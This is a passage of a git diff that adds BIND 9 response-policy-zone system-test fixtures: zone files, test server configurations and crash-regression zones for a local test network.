AAAA 2001:2:4::4 + TXT "a4-4 tld2 text" + +a4-5 A 192.168.4.5 + AAAA 2001:2:4::5 + TXT "a4-5 tld2 text" +a4-5-cname CNAME a4-5 +a4-5-cname2 CNAME a4-5-cname +a4-5-cname3 CNAME a4-5-cname2 + +a4-6 A 192.168.4.6 + AAAA 2001:2:4::6 + TXT "a4-6 tld2 text" +a4-6-cname CNAME a4-6 +a4-6-cname2 CNAME a4-6-cname +a4-6-cname3 CNAME a4-6-cname2 + +a5-1-2 A 192.168.5.1 + A 192.168.5.2 + TXT "a5-1-2 tld2 text" + +a5-2 A 192.168.5.2 + TXT "a5-2 tld2 text" + +a5-3 A 192.168.5.3 + TXT "a5-3 tld2 text" + +a5-4 A 192.168.5.4 + TXT "a5-4 tld2 text" + +a6-1 A 192.168.6.1 + TXT "a6-1 tld2 text" +a6-2 A 192.168.6.2 + TXT "a6-2 tld2 text" + +a7-1 A 192.168.7.1 + TXT "a7-1 tld2 text" + +a7-2 A 192.168.7.2 + TXT "a7-2 tld2 text" diff --git a/bin/tests/system/rpz/ns3/base.db b/bin/tests/system/rpz/ns3/base.db new file mode 100644 index 0000000..f2f15a0 --- /dev/null +++ b/bin/tests/system/rpz/ns3/base.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ test +; This basic file is copied to several zone files before being used. +; Its contents are also changed with nsupdate + + +$TTL 300 +@ SOA blx. hostmaster.ns.blx. ( 1 3600 1200 604800 60 ) + NS ns.tld3. + +; regression testing for some old crashes +example.com NS example.org. + +domain.com cname foobar.com diff --git a/bin/tests/system/rpz/ns3/broken.db.in b/bin/tests/system/rpz/ns3/broken.db.in new file mode 100644 index 0000000..80aa313 --- /dev/null +++ b/bin/tests/system/rpz/ns3/broken.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ test +; This basic file is copied to several zone files before being used. +; Its contents are also changed with nsupdate + + +; broken zone +foobar diff --git a/bin/tests/system/rpz/ns3/crash1 b/bin/tests/system/rpz/ns3/crash1 new file mode 100644 index 0000000..0c85191 --- /dev/null +++ b/bin/tests/system/rpz/ns3/crash1 @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + +; a bad zone that caused a crash related to dns_rdataset_disassociate() + +$TTL 120 +@ SOA crash1.tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + + NS tld2. diff --git a/bin/tests/system/rpz/ns3/crash2 b/bin/tests/system/rpz/ns3/crash2 new file mode 100644 index 0000000..ab70283 --- /dev/null +++ b/bin/tests/system/rpz/ns3/crash2 @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + +; a valid zone containing records that caused crashes + +$TTL 120 +@ SOA crash2.tld3. hostmaster.ns.tld3. ( 1 3600 1200 604800 60 ) + NS ns +ns A 10.53.0.3 + +; #24 in test1, crashed new ASSERT() in rbtdb.c +c1 A 172.16.1.24 + +; #16 in test2, crashed new ASSERT() in rbtdb.c +c2 A 172.16.1.16 diff --git a/bin/tests/system/rpz/ns3/hints b/bin/tests/system/rpz/ns3/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns3/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns3/manual-update-rpz-2.db.in b/bin/tests/system/rpz/ns3/manual-update-rpz-2.db.in new file mode 100644 index 0000000..f670b0c --- /dev/null +++ b/bin/tests/system/rpz/ns3/manual-update-rpz-2.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ test +; This basic file is copied to several zone files before being used. +; Its contents are also changed with nsupdate + + +$TTL 300 +@ SOA bl-reload. hostmaster.ns.bl-reload. ( 2 3600 1200 604800 60 ) + NS ns.tld3. + +walled.tld2.bl-reload. 300 A 10.0.0.2 + diff --git a/bin/tests/system/rpz/ns3/manual-update-rpz.db.in b/bin/tests/system/rpz/ns3/manual-update-rpz.db.in new file mode 100644 index 0000000..a823448 --- /dev/null +++ b/bin/tests/system/rpz/ns3/manual-update-rpz.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ test +; This basic file is copied to several zone files before being used. +; Its contents are also changed with nsupdate + + +$TTL 300 +@ SOA manual-update-rpz. hostmaster.ns.manual-rpz-update. ( 1 3600 1200 604800 60 ) + NS ns.tld3. + +walled.tld2.manual-update-rpz. 300 A 10.0.0.1 diff --git a/bin/tests/system/rpz/ns3/mixed-case-rpz-1.db.in b/bin/tests/system/rpz/ns3/mixed-case-rpz-1.db.in new file mode 100644 index 0000000..c8548fc --- /dev/null +++ b/bin/tests/system/rpz/ns3/mixed-case-rpz-1.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA mixed-case-rpz. hostmaster.ns.mixed-case-rpz. ( 1 3600 1200 604800 60 ) + NS ns.tld3. + +A6-2.TLD2 CNAME . diff --git a/bin/tests/system/rpz/ns3/mixed-case-rpz-2.db.in b/bin/tests/system/rpz/ns3/mixed-case-rpz-2.db.in new file mode 100644 index 0000000..7d99c5a --- /dev/null +++ b/bin/tests/system/rpz/ns3/mixed-case-rpz-2.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA mixed-case-rpz. hostmaster.ns.mixed-case-rpz. ( 2 3600 1200 604800 60 ) + NS ns.tld3. + +a6-1.tld2 CNAME . +A6-2.TLD2 CNAME . diff --git a/bin/tests/system/rpz/ns3/named.conf.in b/bin/tests/system/rpz/ns3/named.conf.in new file mode 100644 index 0000000..dc069d8 --- /dev/null +++ b/bin/tests/system/rpz/ns3/named.conf.in @@ -0,0 +1,160 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Main rpz test DNS server. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + session-keyfile "session.key"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + notify yes; + minimal-responses no; + recursion yes; + dnssec-validation yes; + min-refresh-time 1; + min-retry-time 1; + + response-policy { + zone "fast-expire"; + zone "bl" max-policy-ttl 100; + zone "bl-2"; + zone "bl-given" policy given recursive-only yes; + zone "bl-passthru" policy passthru; + zone "bl-no-op" policy no-op; # obsolete for passthru + zone "bl-disabled" policy disabled; + zone "bl-nodata" policy nodata recursive-only no; + zone "bl-nxdomain" policy nxdomain; + zone "bl-cname" policy cname txt-only.tld2.; + zone "bl-wildcname" policy cname *.tld4.; + zone "bl-garden" policy cname a12.tld2.; + zone "bl-drop" policy drop; + zone "bl-tcp-only" policy tcp-only; + zone "bl.tld2"; + zone "manual-update-rpz"; + zone "mixed-case-rpz"; + } + add-soa yes + min-ns-dots 0 + qname-wait-recurse yes + min-update-interval 0 + nsdname-enable yes + nsip-enable yes + ; + + include "../dnsrps.conf"; + also-notify { 10.53.0.3 port @EXTRAPORT1@; }; + notify-delay 0; +}; + +logging { category rpz { default_debug; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { type hint; file "hints"; }; + +zone "bl." {type primary; file "bl.db"; + allow-update {any;};}; +zone "bl-2." {type primary; file "bl-2.db"; + allow-update {any;};}; +zone "bl-given." {type primary; file "bl-given.db"; + allow-update {any;};}; +zone "bl-passthru." {type primary; file "bl-passthru.db"; + allow-update {any;};}; +zone "bl-no-op." {type primary; file "bl-no-op.db"; + allow-update {any;};}; +zone "bl-disabled." {type primary; file "bl-disabled.db"; + allow-update {any;};}; +zone "bl-nodata." {type primary; file "bl-nodata.db"; + allow-update {any;};}; +zone "bl-nxdomain." {type primary; file "bl-nxdomain.db"; + allow-update {any;};}; +zone "bl-cname." {type primary; file "bl-cname.db"; + allow-update {any;};}; +zone "bl-wildcname." {type primary; file "bl-wildcname.db"; + allow-update {any;};}; +zone "bl-garden." {type primary; file "bl-garden.db"; + allow-update {any;};}; +zone "bl-drop." {type primary; file "bl-drop.db"; + allow-update {any;};}; +zone "bl-tcp-only." {type primary; file "bl-tcp-only.db"; + allow-update {any;};}; + +zone "bl.tld2." {type secondary; file "bl.tld2.db"; primaries {10.53.0.2;}; + request-ixfr no; masterfile-format text;}; + +zone "crash1.tld2" {type primary; file "crash1"; notify no;}; +zone "crash2.tld3." {type primary; file "crash2"; notify no;}; + +zone "manual-update-rpz." { + type primary; + file "manual-update-rpz.db"; + notify no; +}; + +zone "mixed-case-rpz." { + type primary; + file "mixed-case-rpz.db"; + notify no; +}; + +zone "fast-expire." { + type secondary; + file "fast-expire.db"; + primaries { 10.53.0.5; }; + notify no; +}; + +zone "stub." { + type stub; + primaries { 10.53.0.2; }; +}; + +zone "static-stub." { + type static-stub; + server-addresses { 10.53.0.2; }; +}; + +zone "stub-nomatch." { + type stub; + primaries { 10.53.0.10; }; +}; + +zone "static-stub-nomatch." { + type static-stub; + server-addresses { 10.53.0.10; }; +}; + +# A faulty dlz configuration to check if named with response policy zones +# survives a certain class of failed configuration attempts (see GL #3880). +# "dlz" is used because the dlz processing code is located in an ideal place in +# the view configuration function for the test to cover the view reverting code. +# The "BAD" comments below are necessary, because they will be removed using +# 'sed' by tests.sh in order to activate the faulty configuration. +#BAD dlz "bad-dlz" { +#BAD database "dlopen bad-dlz.so example.org"; +#BAD }; diff --git a/bin/tests/system/rpz/ns4/hints b/bin/tests/system/rpz/ns4/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns4/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns4/named.conf.in b/bin/tests/system/rpz/ns4/named.conf.in new file mode 100644 index 0000000..e2a9546 --- /dev/null +++ b/bin/tests/system/rpz/ns4/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "../trusted.conf"; +zone "." { type hint; file "hints"; }; + +zone "tld4." {type primary; file "tld4.db";}; +zone "sub1.tld4." {type primary; file "tld4.db";}; +zone "subsub.sub1.tld4." {type primary; file "tld4.db";}; +zone "sub2.tld4." {type primary; file "tld4.db";}; +zone "subsub.sub2.tld4." {type primary; file "tld4.db";}; diff --git a/bin/tests/system/rpz/ns4/tld4.db b/bin/tests/system/rpz/ns4/tld4.db new file mode 100644 index 0000000..fca419c --- /dev/null +++ b/bin/tests/system/rpz/ns4/tld4.db @@ -0,0 +1,66 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ rewrite responses from this zone + +$TTL 120 +@ SOA tld4. hostmaster.ns.tld4. ( 1 3600 1200 604800 60 ) + NS ns +ns A 10.53.0.4 + + +txt-only TXT "txt-only-tld4" + +a14 A 14.14.14.14 + AAAA 2001::14 + TXT "a14 text" +a14-cname CNAME a14 + +a0-1 A 192.168.0.1 + AAAA 2001:2::1 + TXT "a0-1 text" + +a3-1 A 192.168.3.1 + AAAA 2001:2:3::1 + TXT "a3-1 text" + +a3-2 A 192.168.3.2 + AAAA 2001:2:3::2 + TXT "a3-2 text" + +a4-1 A 192.168.4.1 + AAAA 2001:2:4::1 + TXT "a4-1 text" +a4-1-aaaa AAAA 2001:2:4::1 + +a4-2 A 192.168.4.2 + AAAA 2001:2:4::2 + TXT "a4-2 text" +a4-2-cname CNAME a4-2 + +a4-3 A 192.168.4.3 + AAAA 2001:2:4::3 + TXT "a4-3 text" +a4-3-cname CNAME a4-3 + +a4-4 A 192.168.4.4 + AAAA 2001:2:4::4 + TXT "a4-4 text" + +a3-6.tld2 A 56.56.56.56 + +a3-7.sub1.tld2 A 57.57.57.57 + +a3-8.tld2 A 58.58.58.58 + +a3-9.sub9.tld2 A 59.59.59.59 + +a3-10.tld2 A 60.60.60.60 diff --git a/bin/tests/system/rpz/ns5/empty.db.in b/bin/tests/system/rpz/ns5/empty.db.in new file mode 100644 index 0000000..a7e9144 --- /dev/null +++ b/bin/tests/system/rpz/ns5/empty.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA . hostmaster.ns.example.tld5. ( 1 3600 1200 604800 60 ) + NS . diff --git a/bin/tests/system/rpz/ns5/expire.conf.in b/bin/tests/system/rpz/ns5/expire.conf.in new file mode 100644 index 0000000..4c1c228 --- /dev/null +++ b/bin/tests/system/rpz/ns5/expire.conf.in @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "fast-expire." { + type primary; + file "fast-expire.db"; + allow-transfer { any; }; + notify no; +}; diff --git a/bin/tests/system/rpz/ns5/fast-expire.db.in b/bin/tests/system/rpz/ns5/fast-expire.db.in new file mode 100644 index 0000000..cb2672e --- /dev/null +++ b/bin/tests/system/rpz/ns5/fast-expire.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA fast-expire. hostmaster ( + 1 3 1 5 60 + ) + NS ns.tld3. + +expired.fast-expire. A 10.0.0.10 diff --git a/bin/tests/system/rpz/ns5/hints b/bin/tests/system/rpz/ns5/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns5/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns5/named.args b/bin/tests/system/rpz/ns5/named.args new file mode 100644 index 0000000..56edbe3 --- /dev/null +++ b/bin/tests/system/rpz/ns5/named.args @@ -0,0 +1,2 @@ +# run the performance test close to real life +-c named.conf -D rpz-ns5 -X named.lock -gd3 -T maxcachesize=2097152 diff --git a/bin/tests/system/rpz/ns5/named.conf.in b/bin/tests/system/rpz/ns5/named.conf.in new file mode 100644 index 0000000..b0fecdf --- /dev/null +++ b/bin/tests/system/rpz/ns5/named.conf.in @@ -0,0 +1,91 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Test rpz performance. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + session-keyfile "session.key"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + ixfr-from-differences yes; + notify-delay 0; + notify yes; + minimal-responses no; + recursion yes; + dnssec-validation yes; + + # turn rpz on or off + include "rpz-switch"; + + include "../dnsrps-slave.conf"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "../trusted.conf"; +zone "." {type hint; file "hints"; }; + +zone "tld5." {type primary; file "tld5.db"; }; +zone "example.tld5." {type primary; file "example.db"; }; + +zone "bl0." {type primary; file "bl.db"; }; +zone "bl1." {type primary; file "bl.db"; }; +zone "bl2." {type primary; file "bl.db"; }; +zone "bl3." {type primary; file "bl.db"; }; +zone "bl4." {type primary; file "bl.db"; }; +zone "bl5." {type primary; file "bl.db"; }; +zone "bl6." {type primary; file "bl.db"; }; +zone "bl7." {type primary; file "bl.db"; }; +zone "bl8." {type primary; file "bl.db"; }; +zone "bl9." {type primary; file "bl.db"; }; +zone "bl10." {type primary; file "bl.db"; }; +zone "bl11." {type primary; file "bl.db"; }; +zone "bl12." {type primary; file "bl.db"; }; +zone "bl13." {type primary; file "bl.db"; }; +zone "bl14." {type primary; file "bl.db"; }; +zone "bl15." {type primary; file "bl.db"; }; +zone "bl16." {type primary; file "bl.db"; }; +zone "bl17." {type primary; file "bl.db"; }; +zone "bl18." {type primary; file "bl.db"; }; +zone "bl19." {type primary; file "bl.db"; }; + +zone "policy1" { + type primary; + file "empty.db"; + also-notify { 10.53.0.6; }; + allow-update { any; }; + allow-transfer { any; }; +}; + +zone "policy2" { + type primary; + file "policy2.db"; + allow-update { any; }; + allow-transfer { any; }; +}; + +include "expire.conf"; diff --git a/bin/tests/system/rpz/ns5/tld5.db b/bin/tests/system/rpz/ns5/tld5.db new file mode 100644 index 0000000..b75e72f --- /dev/null +++ b/bin/tests/system/rpz/ns5/tld5.db @@ -0,0 +1,32 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ performance test + +$TTL 120 +@ SOA . hostmaster.ns.example.tld5. ( 1 3600 1200 604800 60 ) + NS ns + NS ns1 + NS ns2 + NS ns3 +ns A 10.53.0.5 +ns1 A 10.53.0.5 +ns2 A 10.53.0.5 +ns3 A 10.53.0.5 + + +$ORIGIN example.tld5. +example.tld5. NS ns + NS ns1 +ns A 10.53.0.5 +ns1 A 10.53.0.5 + +as-ns TXT "rewritten with ip-as-ns and qname-as-ns" diff --git a/bin/tests/system/rpz/ns6/bl.tld2s.db.in b/bin/tests/system/rpz/ns6/bl.tld2s.db.in new file mode 100644 index 0000000..4538050 --- /dev/null +++ b/bin/tests/system/rpz/ns6/bl.tld2s.db.in @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA rpz.tld2. hostmaster.ns.tld2. ( 3 3600 1200 604800 60 ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +32.2.7.168.192.rpz-ip A 1.1.1.1 + AAAA ::1 diff --git a/bin/tests/system/rpz/ns6/hints b/bin/tests/system/rpz/ns6/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns6/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns6/named.conf.in b/bin/tests/system/rpz/ns6/named.conf.in new file mode 100644 index 0000000..4c05207 --- /dev/null +++ b/bin/tests/system/rpz/ns6/named.conf.in @@ -0,0 +1,67 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + session-keyfile "session.key"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + forward only; + forwarders { 10.53.0.3; }; + minimal-responses no; + recursion yes; + dnssec-validation yes; + qname-minimization disabled; + + response-policy { + zone "policy1" min-update-interval 0; + zone "bl.tld2s" policy given; + } qname-wait-recurse yes + // add-soa yes # leave add-soa as default for unset test + nsip-enable yes + nsdname-enable yes; + + include "../dnsrps-slave.conf"; +}; + +logging { category rpz { default_debug; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "../trusted.conf"; + +zone "policy1" { + type secondary; + primaries { 10.53.0.5; }; + file "empty.db"; + also-notify { 10.53.0.3 port @EXTRAPORT1@; }; + notify-delay 0; + allow-transfer { any; }; +}; + +zone "bl.tld2s." { + type primary; + file "bl.tld2s.db"; +}; diff --git a/bin/tests/system/rpz/ns7/hints b/bin/tests/system/rpz/ns7/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns7/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns7/named.conf.in b/bin/tests/system/rpz/ns7/named.conf.in new file mode 100644 index 0000000..24d9c62 --- /dev/null +++ b/bin/tests/system/rpz/ns7/named.conf.in @@ -0,0 +1,59 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + session-keyfile "session.key"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + minimal-responses no; + recursion yes; + dnssec-validation yes; + + response-policy { + zone "policy2" add-soa no; + } qname-wait-recurse no + nsip-enable yes + nsdname-enable yes + min-update-interval 0; + + include "../dnsrps-slave.conf"; +}; + +logging { category rpz { default_debug; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "../trusted.conf"; + +zone "policy2" { + type secondary; + primaries { 10.53.0.5; }; + file "policy2.db"; + also-notify { 10.53.0.3 port @EXTRAPORT1@; }; + notify-delay 0; + allow-transfer { any; }; + request-ixfr no; // force axfr on rndc reload +}; diff --git a/bin/tests/system/rpz/ns8/hints b/bin/tests/system/rpz/ns8/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns8/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns8/manual-update-rpz.db.in b/bin/tests/system/rpz/ns8/manual-update-rpz.db.in new file mode 100644 index 0000000..a823448 --- /dev/null +++ b/bin/tests/system/rpz/ns8/manual-update-rpz.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding 